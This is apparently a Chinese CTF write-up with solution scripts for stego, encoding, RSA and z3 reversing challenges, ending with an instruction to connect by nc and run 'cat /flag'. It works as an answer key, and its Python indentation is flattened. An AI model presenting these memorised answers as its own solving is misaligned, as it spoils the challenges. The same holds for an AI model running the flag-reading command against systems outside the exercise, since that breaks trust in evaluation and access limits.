part3 lsb隐写了一个7z 可以手动弄出来 不弄出来也可以直接看见里面的明文
最终 png-is-easy-for-you
看看构造
table = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
data = "ID71QI6UV7NRV5ULVJDJ1PTVJDVINVBQUNT"
flag = ""
for i in data:
print(bin(table.index(i))[2:])
补到5位解码试试
from Crypto.Util.number import *
table = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
data = "ID71QI6UV7NRV5ULVJDJ1PTVJDVINVBQUNT"
flag = ""
for i in data:
flag += bin(table.index(i))[2:].zfill(5)
print(long_to_bytes(int(flag)))
# b'\x04\x0c\x16\xc1\xb0L\xd3u\x95\x03\xbfv\x98\xf0V\x13\x05\xfcv?\xf3)\xf3\xf3\x0e\xb3\xd0\x91zD\xdd(P\x95\x08\xd4\xc3Q\x96\xee\x1e\xd6$\\\xce\xbf\xae\x17rW+\xffJ\x01V\x97W\x18tT%\r\xb7\xf0rZU.\xfe\x17\x8a,\xbd'
那尝试手动写个flag头看看二进制
# 1001001101001110000111010100100011011110111110011110111110111111100101111101010111111100110110110011000011100111101111111001101101111111001010111111110101111010111101011111101
# 100100110100111000011101010010001101111011
发现是完全对的上的
只是7位一输出 那么最终脚本为
table = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
data = "ID71QI6UV7NRV5ULVJDJ1PTVJDVINVBQUNT"
flag=""
for i in data:
flag+=bin(table.index(i))[2:].zfill(5)
for i in range(int(len(flag)/7)):
ascii_value = int(flag[i * 7:i * 7 + 7], 2)
print(chr(ascii_value), end="")
运行即可
一看output先猜e=65537的rsa
from Crypto.Util.number import *
import gmpy2
from z3 import *
ppq = 292884018782106151080211087047278002613718113661882871562870811030932129300110050822187903340426820507419488984883216665816506575312384940488196435920320779296487709207011656728480651848786849994095965852212548311864730225380390740637527033103610408592664948012814290769567441038868614508362013860087396409860
pp1p = 21292789073160227295768319780997976991300923684414991432030077313041762314144710093780468352616448047534339208324518089727210764843655182515955359309813600286949887218916518346391288151954579692912105787780604137276300957046899460796651855983154616583709095921532639371311099659697834887064510351319531902433355833604752638757132129136704458119767279776712516825379722837005380965686817229771252693736534397063201880826010273930761767650438638395019411119979149337260776965247144705915951674697425506236801595477159432369862377378306461809669885764689526096087635635247658396780671976617716801660025870405374520076160
c = 5203005542361323780340103662023144468501161788183930759975924790394097999367062944602228590598053194005601497154183700604614648980958953643596732510635460233363517206803267054976506058495592964781868943617992245808463957957161100800155936109928340808755112091651619258385206684038063600864669934451439637410568700470057362554045334836098013308228518175901113235436257998397401389511926288739759268080251377782356779624616546966237213737535252748926042086203600860251557074440685879354169866206490962331203234019516485700964227924668452181975961352914304357731769081382406940750260817547299552705287482926593175925396
# p,q = Ints("p q")
# s =Solver()
# s.add(p+q == ppq, (p+1)*(q+1) == pp1p)
# s.check()
# print(s.model())
q = 134094011928749729545065371362722609977806129489242508442578343348280145193982491886499134122427647316566435728309986082300710321155285426063169136067309204867535093965561302236683205598674944172719159174122755219401284720417311361738339972425053993540349468981181899812597265310200720861584501167926682130629
p = 158790006853356421535145715684555392635911984172640363120292467682651984106127558935688769217999173190853053256573230583515796254157099514425027299853011574428952615241450354491797446250111905821376806678089793092463445504963079378899187060678556415052315479031632390956970175728667893646777512692160714279231
n = p*q
e = 65537
d = gmpy2.invert(e,(p-1)*(q-1))
print(long_to_bytes(pow(c,d,n)))
非预期 hint2给了md5
somd5一把梭
from z3 import*
from Crypto.Util.number import *
# print("Please input flag:")
# flag = input()
# if len(flag)!=42:
# print("Check your length!")
# exit()
# l=[]
# for i in range(6):
# s=""
# for j in flag[i*7:i*7+7]:
# s+=hex(ord(j))[2:]
# l.append(int(s,16))
# if (
x1, x2, x3, x4, x5, x6 = Ints("x1 x2 x3 x4 x5 x6")
x = [x1,x2,x3,x4,x5,x6]
s = Solver()
s.add(
(593*x[5] + 997*x[0] + 811*x[1] + 258*x[2] + 829*x[3] + 532*x[4])== 0x54eb02012bed42c08 ,
(605*x[4] + 686*x[5] + 328*x[0] + 602*x[1] + 695*x[2] + 576*x[3])== 0x4f039a9f601affc3a ,
(373*x[3] + 512*x[4] + 449*x[5] + 756*x[0] + 448*x[1] + 580*x[2])== 0x442b62c4ad653e7d9 ,
(560*x[2] + 635*x[3] + 422*x[4] + 971*x[5] + 855*x[0] + 597*x[1])== 0x588aabb6a4cb26838 ,
(717*x[1] + 507*x[2] + 388*x[3] + 925*x[4] + 324*x[5] + 524*x[0])== 0x48f8e42ac70c9af91 ,
(312*x[0] + 368*x[1] + 884*x[2] + 518*x[3] + 495*x[4] + 414*x[5])== 0x4656c19578a6b1170
)
s.check()
print(s.model())
# ):
# print("Good job!")
# else:
# print("Wrong\nTry again!!!")
# exit()
x6= 26860403902456189
x4= 32765855640286324
x5= 28554726411354222
x3= 31015537033047360
x2= 13615593641303915
x1 = 20639221941697358
x = [x1, x2, x3, x4, x5, x6]
for i in range(6):
print(long_to_bytes(x[i]).decode(),end="")
e = 465
n = 3162244531
ezrsa
from Crypto.Util.number import *
import gmpy2
n = 3162244531
c = [0x753C2EC5, 0x8D90C736, 0x81282CB0, 0x7EECC470, 0x944E15D3,0x2C7AC726, 0x717E8070, 0x30CBE439, 0x0B1D95A9C, 0x6DB667BB,0x1240463C, 0x77CBFE64, 0x11D8BE59]
e = 465
p = 56099
q = 56369
d = gmpy2.invert(e,(p-1)*(q-1))
res = [long_to_bytes(pow(i,d,n)).decode() for i in c]
print("".join(res))
nc连上去就行
cat /flag